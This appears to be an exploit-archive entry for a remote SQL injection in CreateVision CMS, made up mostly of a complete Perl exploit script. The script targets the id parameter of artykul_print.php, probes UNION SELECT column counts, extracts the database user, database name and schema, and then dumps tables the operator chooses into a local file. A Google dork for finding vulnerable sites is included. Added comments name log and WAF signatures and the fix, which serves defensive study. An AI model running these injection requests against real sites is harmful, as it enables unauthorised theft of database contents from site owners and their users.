
CreateVision CMS SQL Injection

CreateVision CMS SQL Injection
Posted Feb 25, 2012
Authored by Zwierzchowski Oskar

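CreateVision CMS suffers from a remote SQL injection vulnerability. In the script below, the injection point is the `id` parameter of artykul_print.php, which reaches the database query unfiltered, so a UNION SELECT appended to it returns database contents in the page. Binding `id` as a query parameter, or casting it to an integer before use, closes the injection point.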

tags | exploit, remote, sql injection
SHA-256 | ebd088d94d90a9f803320c16e259a003c877080832b888f520dc7cbbd0cefeaa

CreateVision CMS SQL Injection

#!/usr/local/bin/perl
#
# Exploit Title: CreateVision CMS Database injection.
# Description: Virtually none of the variables are filtered.
# Google Dork: inurl:artykul_print.php
# Date: 2012/02/24
# Author : Zwierzchowski Oskar
# Software Link: http://www.createvision.pl/
# Version: All Version
# Security Risk: High
# Tested on: FreeBSD
# Greets: Grzegorz Stachowiak, Damian Blaszczyk, Borislav Kotov.
use strict;
use warnings;
use LWP::Simple;
# Entry point: seeds the shared settings, validates the command line through
# getops(), then runs every stage once, in a fixed order, against the same
# two hashes. Always returns 0.
#
# Seen from the server side, the stages produce a recognisable sequence of
# GET requests for artykul_print.php: a run of column-count probes, then the
# user(), database() and information_schema.columns queries, then one
# operator-chosen table query.
sub main ()
{
    # 'host' is filled in by getops(); 'columns' starts as ',3,4' and is
    # lengthened by getcolumn() through incrcolum().
    my %config;
    @config{qw(host columns column table)} = ('', ',3,4', '', '');

    # Request paths, written by getcolumn() and otherdata().
    my %send;

    getops(\%config);

    my @stages = (\&getcolumn, \&getuser, \&getdatabase, \&gettables, \&otherdata);
    for my $stage (@stages) {
        $stage->(\%config, \%send);
    }

    return 0;
}
# Requests the path stored in $send->{database} from the configured host and
# passes the response body to analizedata() under the 'Database' label.
#
# Parameters: $config (hash ref, reads {host}), $send (hash ref, reads
# {database}).
# Returns the same ($config, $send) pair.
#
# The request carries "union+select" and "database()" in the id parameter of
# artykul_print.php, which is what an access log or WAF rule would match on.
sub getdatabase ($$)
{
    my ($config, $send) = @_;

    my $url  = $config->{host} . $send->{database};
    my $body = get($url);

    analizedata($body, 'Database');
    return ($config, $send);
}
# Requests the path stored in $send->{user} from the configured host and
# passes the response body to analizedata() under the 'User' label.
#
# Parameters: $config (hash ref, reads {host}), $send (hash ref, reads {user}).
# Returns the same ($config, $send) pair.
#
# The request carries "union+select" and "user()" in the id parameter of
# artykul_print.php, which is what an access log or WAF rule would match on.
sub getuser ($$)
{
    my ($config, $send) = @_;

    my $url  = $config->{host} . $send->{user};
    my $body = get($url);

    analizedata($body, 'User');
    return ($config, $send);
}
# Requests the path stored in $send->{column} (the information_schema.columns
# query) from the configured host and passes the response body to
# analizedata() under the 'Tables' label.
#
# Parameters: $config (hash ref, reads {host}), $send (hash ref, reads
# {column}).
# Returns whatever analizedata() returns, since that call is the sub's value.
#
# A request for artykul_print.php that names information_schema.columns in
# its id parameter has no legitimate use and is a strong detection signal.
sub gettables ($$)
{
    my ($config, $send) = @_;

    my $url  = $config->{host} . $send->{column};
    my $body = get($url);

    return analizedata($body, 'Tables');
}
# Interactive last stage: asks on STDIN whether to continue, then reads a
# table name and a comma-separated column list and issues one more request
# built from them. The response body goes to analizedata() under 'MYDATA'.
#
# Parameters: $config (hash ref, reads {host} and {columns}), $send (hash
# ref, {tables} is written).
# Returns 0; exits the process with status 0 when the answer is 2.
#
# Defender's view: the resulting request has "union+select", "concat(",
# "char(58)" and "+from+" inside the id parameter of artykul_print.php.
# None of these belong in a numeric article id, so the application-side fix
# is to bind id as a parameter or cast it to an integer.
sub otherdata ($$)
{
my $config = shift;
my $send = shift;
my $data;
my $table;
my $column;
print "[+]\tIf you want to draw some data? (1 or 2)\r\n\r\n";
print "[1]\tYes\r\n";
print "[2]\tNo\r\n";
$data = <STDIN>;
chomp($data);
# Numeric comparison: only an answer equal to 2 stops the script. Any other
# input, including non-numeric text (which warns under 'use warnings'),
# falls through to the else branch.
if ($data == 2)
{
exit 0;
}
else
{
print "[+]\tName of the table which you want to download (check the output.txt) :\r\n";
$table = <STDIN>;
chomp($table);
print "[+]\tGet column/s: (ex. column1,column2,column3)\r\n";
$column = <STDIN>;
chomp($column);
# Each comma becomes ",char(58),", so concat() joins the selected columns
# with a ':' separator in the returned text.
$column =~ s/,/,char(58),/g;
# The table and column text from STDIN is concatenated into the path as
# typed; nothing here validates or URL-encodes it.
$send->{tables} = '/artykul_print.php?id=103+and+1=2+union+select+1,concat('.$column.')'.$config->{columns}.'+from+'.$table.'--';
$data = get $config->{host}.$send->{tables};
analizedata($data, 'MYDATA');
}
return 0;
}
# Scans a response body for every <span class="tytul_artykulu">...</span>
# element and records the text inside each one.
#
# Parameters:
#   $data - response body to scan.
#   $pref - label for the output; the value 'Tables' selects table/column
#           bookkeeping instead of per-match printing.
# Returns 0.
#
# Every match is appended to output.txt through save(). The text comes from
# the remote server's response, so that file holds whatever the queried
# database returned and should be handled as sensitive data.
sub analizedata ($$)
{
    my ($data, $pref) = @_;

    # Both lists start with one empty placeholder, so $#list equals the
    # number of entries pushed afterwards.
    my @columns = ('');
    my @tables  = ('');

    while ($data =~ /<span class=\"tytul_artykulu\">(.*?)<\/span>/g) {
        my $hit = $1;

        if ($pref ne 'Tables') {
            print join('', "[+]\t[", $pref, "][", $hit, "]\r\n");
            save($hit, 'output.txt');
            next;
        }

        # 'Tables' rows arrive as "table:column" (the ':' is the char(58)
        # separator placed in the query).
        my ($table, $column) = split(/:/, $hit);
        save($hit, 'output.txt');
        push(@columns, $column);

        # Only a change of table name relative to the last one recorded
        # adds a new table entry.
        push(@tables, $table) unless $table eq $tables[-1];
    }

    if ($pref eq 'Tables') {
        print "[+]\t" . $#columns . " columns in " . $#tables . " tables\r\n";
        print "[+]\tResults has been saved into output.txt\r\n";
    }

    return 0;
}
# Reads the target from the first command-line argument.
#
# Parameter: $config (hash ref); {host} is set to $ARGV[0] when accepted.
# Returns $config. When the argument is missing, false, or does not contain
# "http://", prints the usage line and exits with status 0.
#
# The pattern is not anchored, so any argument that contains "http://"
# anywhere is accepted as the host.
sub getops ($)
{
    my ($config) = @_;
    my $target = $ARGV[0];

    if ($target && $target =~ /http:\/\//) {
        $config->{host} = $target;
        return $config;
    }

    print "[+]\tUsage: perl splo.pl http://host.com\r\n";
    exit 0;
}
# Probes for the column count of the injected UNION SELECT. Each pass adds
# one more column number through incrcolum(), rebuilds the three request
# paths, and fetches the user() path; the probe counts as successful when
# the response contains the <span class="tytul_artykulu"> marker.
#
# Parameters: $config (hash ref, {columns} is extended, {host} is read),
# $send (hash ref, {user}, {database} and {column} are written).
# Returns ($config, $send) as soon as the marker is seen; after 20 passes
# without it, returns $config alone and leaves the last paths in $send.
#
# Defender's view: this is a burst of up to 20 GET requests for
# artykul_print.php, identical except for a growing ",3,4,5,..." list after
# "union+select+1,user()". Binding id as a query parameter, or casting it to
# an integer, makes every one of them fail.
sub getcolumn ($$)
{
my $config = shift;
my $send = shift;
my $data;
for (1..20)
{
incrcolum($config);
$send->{user} = '/artykul_print.php?id=105+and+1=2+union+select+1,user()'.$config->{columns}.'--';
$send->{database} = '/artykul_print.php?id=105+and+1=2+union+select+1,database()'.$config->{columns}.'--';
$send->{column} = '/artykul_print.php?id=105+and+1=2+union+select+1,concat(table_name,char(58),column_name)'.$config->{columns}.'+from+information_schema.columns--';
# LWP::Simple's get returns undef when the request fails, in which case
# the index() call below warns under 'use warnings'.
$data = get $config->{host}.$send->{user};
if (index($data, "<span class=\"tytul_artykulu\">") != -1)
{
return ($config, $send);
}
}
# No pass produced the marker: only $config is returned here.
return $config;
}
# Extends the comma-separated column list in $config->{columns} by one
# entry: the last number in the list plus one (',3,4' becomes ',3,4,5').
#
# Parameter: $config (hash ref); {columns} is modified in place.
# Returns $config.
sub incrcolum ($)
{
    my ($config) = @_;

    my $current = $config->{columns};
    my $next    = (split(/,/, $current))[-1] + 1;

    # The current value is used as the search pattern. For the digit-and-comma
    # values this script produces it matches the whole string once, so the
    # substitution amounts to appending ",$next".
    $config->{columns} =~ s/$current/$current,$next/g;

    return $config;
}
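# Appends one record, terminated by CRLF, to a file.
#
# Parameters:
#   $data - text to write.
#   $file - path of the file to append to; created if it does not exist.
# Returns 0 on success, 1 when the file cannot be opened or written (a
# warning is printed and the caller carries on, as before).
#
# The records written here are taken from a remote server's response, so the
# output file should be treated as untrusted and potentially sensitive.
sub save ($$)
{
    my ($data, $file) = @_;

    # Three-argument open with a lexical handle: the path is used verbatim
    # and is never parsed for mode characters, pipes or surrounding
    # whitespace, which the two-argument form would do.
    my $fh;
    unless (open($fh, '>>', $file)) {
        warn "save: cannot open $file for append: $!\n";
        return 1;
    }

    my $written = print {$fh} "" . $data . "\r\n";

    # Buffered write errors only surface at close, so check both steps.
    my $closed = close($fh);
    unless ($written && $closed) {
        warn "save: write to $file failed: $!\n";
        return 1;
    }

    return 0;
}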
# Script entry: every sub above is defined by this point. main()'s return
# value is discarded, so the exit status comes from normal termination or
# from the explicit 'exit 0' calls in getops() and otherdata().
main();
